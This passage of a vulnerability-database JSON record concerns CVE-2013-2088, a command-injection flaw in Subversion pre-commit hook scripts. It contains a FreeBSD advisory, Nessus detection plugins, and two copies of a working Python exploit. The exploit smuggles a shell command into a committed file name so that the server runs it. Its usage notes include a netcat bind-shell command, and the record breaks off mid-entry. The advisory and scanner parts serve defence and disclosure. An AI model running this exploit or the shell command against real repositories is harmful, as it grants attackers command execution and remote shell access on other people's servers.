hyphen. This could be\n\t used to cause 'svnlook', and hence check-mime-type.pl, to error out.\nThe script contrib/hook-scripts/svn-keyword-check.pl parses filenames\n\t from the output of 'svnlook changed' and passes them to a further\n\t shell command (equivalent to the 'system()' call of the C standard\n\t library) without escaping them. This could be used to run arbitrary\n\t shell commands in the context of the user whom the pre-commit script\n\t runs as (the user who owns the repository).\n\n", "edition": 4, "modified": "2013-05-31T00:00:00", "published": "2013-05-31T00:00:00", "id": "6D0BF320-CA39-11E2-9673-001E8C75030D", "href": "https://vuxml.freebsd.org/freebsd/6d0bf320-ca39-11e2-9673-001e8c75030d.html", "title": "devel/subversion -- contrib hook-scripts can allow arbitrary code execution", "type": "freebsd", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:17:55", "description": "", "published": "2016-10-13T00:00:00", "type": "packetstorm", "title": "Subversion 1.6.6 / 1.6.12 Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2088"], "modified": "2016-10-13T00:00:00", "id": "PACKETSTORM:139131", "href": "https://packetstormsecurity.com/files/139131/Subversion-1.6.6-1.6.12-Code-Execution.html", "sourceData": "`# This is an exploit for the subversion vulnerability published as CVE-2013-2088. \n \n# Author: GlacierZ0ne (kai@ktechnologies.de) \n# Exploit Type: Code Execution \n# Access Type: Authenticated Remote Exploit \n# Prerequisites: svn command line client available, \n# subversion server exposes webdav through apache, \n# user/password with commit privilege \n \n# The exploit has been tested with the following software: \n \n# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit \n# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit \n# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit \n \n# The following conditions need to be met in order for this to work: \n \n# The pre-commit script svn-keyword-check.pl needs to be configured as \n# pre-commit hook. The version shipped with the subversion 1.6.6 contains \n# a bug which prevents it from being used at all. This bug must be fixed \n# (otherwise neither the exploit, nor the intented purpose of the script \n# will work) \n# This perl script can be downloaded from the archive source distribution \n# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23 \n# are vulnerable. \n \n# ############################################################### \n \n# 1. configure the pre-commit hook to use svn-keyword-check.pl \n \n# ############################################################### \n# Copy the svn-keyword-check.pl from the source distribution to the \n# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl \n# to pre-commit. Make sure both files are owned by the user running \n# apache (e.g. www-data) and have the executable flag set: \n# \n# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks \n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit \n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit \n# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al \n# total 76 \n# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 . \n# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 .. \n# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl \n# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl \n# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl \n# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl \n# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit \n# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl \n# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl \n# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl \n# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl \n# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl \n# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl \n# notroot@ubuntu:/svn/repos/testrepo/hooks$ \n \n# According to the subversion documentation, svn-keyword-check.pl needs \n# to be called by pre-commit. svn-keyword-check.pl will return 1 if it \n# detects something that should prevent the commit. In that case, the \n# subversion server will cancel the commit. Here's how pre-commit looked \n# on my test server: \n \n# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit \n# #!/bin/sh \n \n# REPOS=\"$1\" \n# TXN=\"$2\" \n \n# # Make sure that the log message contains some text. \n# #jSVNLOOK=/usr/bin/svnlook \n# $SVNLOOK log -t \"$TXN\" \"$REPOS\" | \\ \n# ep \"[a-zA-Z0-9]\" > /dev/null || exit 1 \n# \n# # Exit on all errors. \n# set -e \n# \n# # Check the files that are are listed in \"svnlook changed\" (except deleted \n# # files) for possible problems with svn:keywords set on binary files. \n# \"$REPOS\"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN \n# # \n# # \n# # \n# \n# # All checks passed, so allow the commit. \n# exit 0 \n# \n# ############################################################### \n# \n# 2. fix the bug in svn-keyword-check.pl \n# \n# ############################################################### \n# The script pre-commit will pass on repository and transaction to \n# the script svn-keyword-check.pl. Alternatively, it also accepts \n# repository and revision. However, specifying both transaction \n# and revision is illegal, only one of them is considered legal. \n# This reflects in the input parameter plausibility check \n# performed in line 89: \n# \n# if (defined($transaction) and !defined($revision)) { \n# croak \"Can't define both revision and transaction!\\n\"; \n# } \n# \n# Unfortunately, there is an exclamation mark too much. It must \n# be \n# \n# if (defined($transaction) and defined($revision)) { \n# croak \"Can't define both revision and transaction!\\n\"; \n# } \n# \n# The way this script is shipped in the 1.6.6 source distribution \n# no commit is possible at all. \n# \n# Before using the exploit you should first commit one file \n# manually so that the svn client can store your user/password \n# locally. \n# \n# Then, open a shell and navigate to the directory of your project \n# and start python cve-2013-2088-1.py <command>: \n# \n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig \n# [+] Randfilename is mJHeSkya \n# [+] Created random file \n# [+] Submitted random file to version control \n# [+] Created fake file for cmd execution \n# [+] Exploit seems to work: \n# \n# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a \n# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0 \n# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link \n# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 \n# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0 \n# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0 \n# collisions:0 txqueuelen:1000 \n# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB) \n# \n# lo Link encap:Local Loopback \n# inet addr:127.0.0.1 Mask:255.0.0.0 \n# inet6 addr: ::1/128 Scope:Host \n# UP LOOPBACK RUNNING MTU:16436 Metric:1 \n# RX packets:0 errors:0 dropped:0 overruns:0 frame:0 \n# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 \n# collisions:0 txqueuelen:0 \n# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) \n# \n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id \n# [+] Randfilename is WmolHiuv \n# [+] Created random file \n# [+] Submitted random file to version control \n# [+] Created fake file for cmd execution \n# [+] Exploit seems to work: \n# \n# uid=33(www-data) gid=33(www-data) groups=33(www-data) \n# \n# \n# Important things to notice \n \n# * For each command execution the exploit will put a file under \n# version control. If you submit a lot of commands you will \n# create a lot of files with random 8 alphanumeric character \n# file names in your repository. \n# * Your command must not contain a / since file names must not \n# contain a /. In the author's test environment the current \n# working directory of apache was the root folder /. \n# Therefore, the exploit will replace / in the command with \n# $(pwd). This worked fine for the author. \n# In your environment this might be different. As first thing \n# execute $(pwd) in order to check if this works for you, too. \n# * The command execution assumes that your command prints something \n# to the terminal and exits. If you know your command will not \n# immediately terminate (e.g. because you're starting a reverse/ \n# bind shell), provide the -d or --dont-terminate flag: \n# python svn_exploit2.py -d \"/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe\" \n# \n# \n# \nimport sys \nimport subprocess \nimport argparse \nimport random \nimport os \n \nif __name__ == \"__main__\": \n \nlowerupper = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\" \nslash_replacement = \"$(pwd)\" \ncwd = os.getcwd() \n \nparser = argparse.ArgumentParser (usage=\"python {} [options] command\".format (sys.argv [0]), \nepilog=\"\\x0a\\x0a\") \n \nparser.add_argument (dest=\"command\", help=\"Command to execute\") \nparser.add_argument (\"-d\", \"--dont-terminate\", help=\"don't force output be sent back to the client. Useful for reverse shell connections.\", \naction=\"store_true\") \n \n# \n# args handling \n# \nif (len(sys.argv) <= 1): \nparser.print_help () \nsys.exit (0) \n \nargs = parser.parse_args () \nif not args.command: \nparser.print_help () \nsys.exit (0) \n \n# \n# / cannot be used in the command because svn will interprete it as \n# file separator. Therefore you have to use a workaround. Here, \n# $(pwd) works great for us. \n# \ncommand = args.command \nif command.find (\"/\") != -1: \ncommand = command.replace(\"/\", slash_replacement) \n \n# \n# prepare output files for stdout, stderr \n# \nsout = open (\"stdout\", \"w+\") \nserr = open (\"stderr\", \"w+\") \n \nrandfilename = \"\" \nfor idx in range (0, 8): \nrandfilename = randfilename + lowerupper [random.randint (0,51)] \n \nprint (\"[+] Randfilename is {}\".format(randfilename)) \n \nf = open (randfilename, \"w+\") \nf.write (\"You've been pwned by GlacierZ0ne'\") # write 4 \nf.flush () \nf.close () \n \np = subprocess.Popen ([\"svn\", \"add\", \"./{randfilename}\".format (randfilename=randfilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) > 0: \nprint (\"[-] Create random file failed:\") \nprint (c[1]) \nsys.exit (0) \nprint (\"[+] Created random file\") \n \np = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"./{randfilename}\".format (randfilename=randfilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) > 0: \nprint (\"[-] Submission of random file failed:\") \nprint (c[1]) \nsys.exit (0) \nprint (\"[+] Submitted random file to version control\") \n \nfakefilename = None \nif args.dont_terminate == True: \nfakefilename = \"{}; {}\".format (randfilename, command) \nelse: \nfakefilename = \"{}; {} 1>&2; exit 1\".format (randfilename, command) \nf = open (fakefilename, \"w+\") \nf.write (\"You've been pwned by GlacierZ0ne\") # write 4 \nf.flush () \nf.close () \n \np = subprocess.Popen ([\"svn\", \"add\", \"{fakefilename}\" \n.format (cwd=cwd, fakefilename=fakefilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) > 0: \nprint (\"[-] Creation of fake file failed:\") \nprint (c[1]) \nsys.exit (0) \nprint (\"[+] Created fake file for cmd execution\") \n \np = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"{fakefilename}\" \n.format (cwd=cwd, fakefilename=fakefilename)], \nstdout=subprocess.PIPE, stderr=subprocess.PIPE) \nc = p.communicate () \nsout.write (c[0]) \nif len(c[1]) == 0: \nif not args.dont_terminate: \nprint \"[-] Something went wrong, pre-commit hook didn't kick in.\" \nelse: \nprint \"[!] Done\" \nsys.exit (0) \nelse: \nidx0= c[1].find (\"Commit blocked by pre-commit hook\") \nidx = c[1].find (\"failed with this output\") \n \nif idx0 != -1 and idx != -1: \nprint (\"[+] Exploit seems to work: \") \nprint (c[1][idx + len(\"failed with this output\") + 1:]) \n \nsout.flush () \nsout.close () \nserr.flush () \nserr.close () \n \n \n`\n", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139131/subversion-exec.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSubversion 1.6.61.6.12 - Code Execution", "edition": 1, "published": "2016-10-12T00:00:00", "title": "Subversion 1.6.61.6.12 - Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-2088"], "modified": "2016-10-12T00:00:00", "id": "EXPLOITPACK:788FB751D9E44436830A9D1B67E28792", "href": "", "sourceData": "# This is an exploit for the subversion vulnerability published as CVE-2013-2088.\n\n# Author: GlacierZ0ne (kai@ktechnologies.de)\n# Exploit Type: Code Execution\n# Access Type: Authenticated Remote Exploit\n# Prerequisites: svn command line client available,\n# subversion server exposes webdav through apache,\n# user/password with commit privilege\n\n# The exploit has been tested with the following software:\n\n# * subversion 1.6.6 server on Ubuntu 10.06 server 64-bit\n# * subversion 1.6.12 (r955767) on Ubuntu 11.10 server 32-bit\n# * subversion client version 1.8.8 (r1568071) on Ubuntu 14.04 64-bit\n\n# The following conditions need to be met in order for this to work:\n\n# The pre-commit script svn-keyword-check.pl needs to be configured as\n# pre-commit hook. The version shipped with the subversion 1.6.6 contains\n# a bug which prevents it from being used at all. This bug must be fixed\n# (otherwise neither the exploit, nor the intented purpose of the script\n# will work)\n# This perl script can be downloaded from the archive source distribution\n# at http://archive.apache.org/dist/subversion/. Scripts before 1.6.23\n# are vulnerable.\n\n# ###############################################################\n\n# 1. configure the pre-commit hook to use svn-keyword-check.pl\n\n# ###############################################################\n# Copy the svn-keyword-check.pl from the source distribution to the\n# /svn/repos/<your repository>/hooks directory. Rename pre-commit.tmpl\n# to pre-commit. Make sure both files are owned by the user running\n# apache (e.g. www-data) and have the executable flag set:\n#\n# notroot@ubuntu:/$ cd /svn/repositories/testrepo/hooks\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo mv pre-commit.tmpl pre-commit\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ sudo chmod +x pre-commit\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ ls -al\n# total 76\n# drwxr-xr-x 2 www-data www-data 4096 2016-09-30 13:35 .\n# drwxr-xr-x 7 www-data www-data 4096 2016-09-05 16:28 ..\n# -rw-r--r-- 1 www-data www-data 2000 2016-09-05 15:23 post-commit.tmpl\n# -rw-r--r-- 1 www-data www-data 1663 2016-09-05 15:23 post-lock.tmpl\n# -rw-r--r-- 1 www-data www-data 2322 2016-09-05 15:23 post-revprop-change.tmpl\n# -rw-r--r-- 1 www-data www-data 1592 2016-09-05 15:23 post-unlock.tmpl\n# -rwxr-xr-x 1 www-data www-data 604 2016-09-30 13:32 pre-commit\n# -rw-r--r-- 1 www-data www-data 609 2016-09-05 19:10 pre-commit.tmpl\n# -rw-r--r-- 1 www-data www-data 2410 2016-09-05 15:23 pre-lock.tmpl\n# -rw-r--r-- 1 www-data www-data 2796 2016-09-05 15:23 pre-revprop-change.tmpl\n# -rw-r--r-- 1 www-data www-data 2100 2016-09-05 15:23 pre-unlock.tmpl\n# -rw-r--r-- 1 www-data www-data 2830 2016-09-05 15:23 start-commit.tmpl\n# -rwxr-xr-x 1 www-data www-data 8340 2016-09-30 13:35 svn-keyword-check.pl\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ \n\n# According to the subversion documentation, svn-keyword-check.pl needs\n# to be called by pre-commit. svn-keyword-check.pl will return 1 if it\n# detects something that should prevent the commit. In that case, the\n# subversion server will cancel the commit. Here's how pre-commit looked\n# on my test server:\n\n# notroot@ubuntu:/svn/repos/testrepo/hooks$ cat pre-commit\n# #!/bin/sh\n\n# REPOS=\"$1\"\n# TXN=\"$2\"\n\n# # Make sure that the log message contains some text.\n# #jSVNLOOK=/usr/bin/svnlook\n# $SVNLOOK log -t \"$TXN\" \"$REPOS\" | \\\n# ep \"[a-zA-Z0-9]\" > /dev/null || exit 1\n# \n# # Exit on all errors.\n# set -e\n# \n# # Check the files that are are listed in \"svnlook changed\" (except deleted\n# # files) for possible problems with svn:keywords set on binary files.\n# \"$REPOS\"/hooks/svn-keyword-check.pl --repos $REPOS --transaction $TXN\n# #\n# #\n# #\n# \n# # All checks passed, so allow the commit.\n# exit 0\n# \n# ###############################################################\n# \n# 2. fix the bug in svn-keyword-check.pl\n# \n# ###############################################################\n# The script pre-commit will pass on repository and transaction to\n# the script svn-keyword-check.pl. Alternatively, it also accepts\n# repository and revision. However, specifying both transaction\n# and revision is illegal, only one of them is considered legal.\n# This reflects in the input parameter plausibility check\n# performed in line 89:\n# \n# if (defined($transaction) and !defined($revision)) {\n# croak \"Can't define both revision and transaction!\\n\";\n# }\n# \n# Unfortunately, there is an exclamation mark too much. It must\n# be\n# \n# if (defined($transaction) and defined($revision)) {\n# croak \"Can't define both revision and transaction!\\n\";\n# }\n# \n# The way this script is shipped in the 1.6.6 source distribution\n# no commit is possible at all.\n# \n# Before using the exploit you should first commit one file\n# manually so that the svn client can store your user/password\n# locally.\n# \n# Then, open a shell and navigate to the directory of your project\n# and start python cve-2013-2088-1.py <command>:\n#\n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py ifconfig\n# [+] Randfilename is mJHeSkya\n# [+] Created random file\n# [+] Submitted random file to version control\n# [+] Created fake file for cmd execution\n# [+] Exploit seems to work: \n#\n# eth0 Link encap:Ethernet HWaddr 00:0c:29:08:a3:1a \n# inet addr:192.168.26.136 Bcast:192.168.26.255 Mask:255.255.255.0\n# inet6 addr: fe80::20c:29ff:fe08:a31a/64 Scope:Link\n# UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\n# RX packets:1060 errors:0 dropped:0 overruns:0 frame:0\n# TX packets:806 errors:0 dropped:0 overruns:0 carrier:0\n# collisions:0 txqueuelen:1000 \n# RX bytes:172042 (172.0 KB) TX bytes:136684 (136.6 KB)\n#\n# lo Link encap:Local Loopback \n# inet addr:127.0.0.1 Mask:255.0.0.0\n# inet6 addr: ::1/128 Scope:Host\n# UP LOOPBACK RUNNING MTU:16436 Metric:1\n# RX packets:0 errors:0 dropped:0 overruns:0 frame:0\n# TX packets:0 errors:0 dropped:0 overruns:0 carrier:0\n# collisions:0 txqueuelen:0 \n# RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)\n#\n# kai@KTEC64:~/eworkspace/kais_1_project$ python svn_exploit2.py id\n# [+] Randfilename is WmolHiuv\n# [+] Created random file\n# [+] Submitted random file to version control\n# [+] Created fake file for cmd execution\n# [+] Exploit seems to work: \n#\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\n#\n#\n# Important things to notice\n\n# * For each command execution the exploit will put a file under\n# version control. If you submit a lot of commands you will\n# create a lot of files with random 8 alphanumeric character\n# file names in your repository.\n# * Your command must not contain a / since file names must not\n# contain a /. In the author's test environment the current\n# working directory of apache was the root folder /.\n# Therefore, the exploit will replace / in the command with\n# $(pwd). This worked fine for the author.\n# In your environment this might be different. As first thing\n# execute $(pwd) in order to check if this works for you, too.\n# * The command execution assumes that your command prints something\n# to the terminal and exits. If you know your command will not\n# immediately terminate (e.g. because you're starting a reverse/\n# bind shell), provide the -d or --dont-terminate flag:\n# python svn_exploit2.py -d \"/bin/bash 0</tmp/mypipe | nc -l 192.168.1.100 4444 1> /tmp/mypipe\"\n#\n#\n#\nimport sys\nimport subprocess\nimport argparse\nimport random\nimport os\n\nif __name__ == \"__main__\":\n\n lowerupper = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ\"\n slash_replacement = \"$(pwd)\" \n cwd = os.getcwd()\n\n parser = argparse.ArgumentParser (usage=\"python {} [options] command\".format (sys.argv [0]),\n epilog=\"\\x0a\\x0a\")\n\n parser.add_argument (dest=\"command\", help=\"Command to execute\")\n parser.add_argument (\"-d\", \"--dont-terminate\", help=\"don't force output be sent back to the client. Useful for reverse shell connections.\",\n action=\"store_true\")\n\n #\n # args handling\n #\n if (len(sys.argv) <= 1):\n parser.print_help ()\n sys.exit (0)\n\n args = parser.parse_args ()\n if not args.command:\n parser.print_help ()\n sys.exit (0)\n\n #\n # / cannot be used in the command because svn will interprete it as\n # file separator. Therefore you have to use a workaround. Here,\n # $(pwd) works great for us.\n #\n command = args.command\n if command.find (\"/\") != -1:\n command = command.replace(\"/\", slash_replacement)\n \n #\n # prepare output files for stdout, stderr\n #\n sout = open (\"stdout\", \"w+\")\n serr = open (\"stderr\", \"w+\")\n\n randfilename = \"\"\n for idx in range (0, 8):\n randfilename = randfilename + lowerupper [random.randint (0,51)]\n\n print (\"[+] Randfilename is {}\".format(randfilename))\n\n f = open (randfilename, \"w+\")\n f.write (\"You've been pwned by GlacierZ0ne'\") # write 4\n f.flush ()\n f.close ()\n\n p = subprocess.Popen ([\"svn\", \"add\", \"./{randfilename}\".format (randfilename=randfilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) > 0:\n print (\"[-] Create random file failed:\")\n print (c[1])\n sys.exit (0)\n print (\"[+] Created random file\")\n \n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"./{randfilename}\".format (randfilename=randfilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) > 0:\n print (\"[-] Submission of random file failed:\")\n print (c[1])\n sys.exit (0)\n print (\"[+] Submitted random file to version control\")\n\n fakefilename = None\n if args.dont_terminate == True:\n fakefilename = \"{}; {}\".format (randfilename, command)\n else:\n fakefilename = \"{}; {} 1>&2; exit 1\".format (randfilename, command)\n f = open (fakefilename, \"w+\")\n f.write (\"You've been pwned by GlacierZ0ne\") # write 4\n f.flush ()\n f.close ()\n\n p = subprocess.Popen ([\"svn\", \"add\", \"{fakefilename}\"\n .format (cwd=cwd, fakefilename=fakefilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE) \n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) > 0:\n print (\"[-] Creation of fake file failed:\")\n print (c[1])\n sys.exit (0)\n print (\"[+] Created fake file for cmd execution\")\n \n p = subprocess.Popen ([\"svn\", \"commit\", \"-m\", \"I pwned you\", \"{fakefilename}\"\n .format (cwd=cwd, fakefilename=fakefilename)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n c = p.communicate ()\n sout.write (c[0])\n if len(c[1]) == 0:\n if not args.dont_terminate:\n print \"[-] Something went wrong, pre-commit hook didn't kick in.\"\n else:\n print \"[!] Done\"\n sys.exit (0)\n else:\n idx0= c[1].find (\"Commit blocked by pre-commit hook\")\n idx = c[1].find (\"failed with this output\")\n \n if idx0 != -1 and idx != -1:\n print (\"[+] Exploit seems to work: \")\n print (c[1][idx + len(\"failed with this output\") + 1:])\n \n sout.flush ()\n sout.close ()\n serr.flush ()\n serr.close ()", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-07T10:45:13", "description": "Subversion team reports :\n\nThe script contrib/hook-scripts/check-mime-type.pl does not escape\nargv arguments to 'svnlook' that start with a hyphen. This could be\nused to cause 'svnlook', and hence check-mime-type.pl, to error out.\n\nThe script contrib/hook-scripts/svn-keyword-check.pl parses filenames\nfrom the output of 'svnlook changed' and passes them to a further\nshell command (equivalent to the 'system()' call of the C standard\nlibrary) without escaping them. This could be used to run arbitrary\nshell commands in the context of the user whom the pre-commit script\nruns as (the user who owns the repository).", "edition": 22, "published": "2013-06-02T00:00:00", "title": "FreeBSD : devel/subversion -- contrib hook-scripts can allow arbitrary code execution (6d0bf320-ca39-11e2-9673-001e8c75030d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088"], "modified": "2013-06-02T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:subversion"], "id": "FREEBSD_PKG_6D0BF320CA3911E29673001E8C75030D.NASL", "href": "https://www.tenable.com/plugins/nessus/66736", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(66736);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2088\");\n\n script_name(english:\"FreeBSD : devel/subversion -- contrib hook-scripts can allow arbitrary code execution (6d0bf320-ca39-11e2-9673-001e8c75030d)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Subversion team reports :\n\nThe script contrib/hook-scripts/check-mime-type.pl does not escape\nargv arguments to 'svnlook' that start with a hyphen. This could be\nused to cause 'svnlook', and hence check-mime-type.pl, to error out.\n\nThe script contrib/hook-scripts/svn-keyword-check.pl parses filenames\nfrom the output of 'svnlook changed' and passes them to a further\nshell command (equivalent to the 'system()' call of the C standard\nlibrary) without escaping them. This could be used to run arbitrary\nshell commands in the context of the user whom the pre-commit script\nruns as (the user who owns the repository).\"\n );\n # https://vuxml.freebsd.org/freebsd/6d0bf320-ca39-11e2-9673-001e8c75030d.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8e41ba3e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:subversion\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/02\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"subversion>=1.7.0<1.7.10\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"subversion>=1.2.0<1.6.23\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T06:24:51", "description": "The installed version of Subversion Server is affected by the\nfollowing vulnerabilities :\n\n - An input validation error exists in two files in the\n 'contrib/' directory that could allow arbitrary code\n execution. Note that this issue does not affect version\n 1.8.0. (CVE-2013-2088)\n\n - An error exists related to the 'mod_dav_svn' Apache\n module that could allow denial of service attacks. Note\n that this issue does not affect the 1.6.x branch.\n (CVE-2013-4131)", "edition": 27, "published": "2013-12-20T00:00:00", "title": "Apache Subversion 1.6.x / 1.7.x / 1.8.x < 1.6.23 / 1.7.11 / 1.8.1 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2088", "CVE-2013-4131"], "modified": "2021-04-02T00:00:00", "cpe": 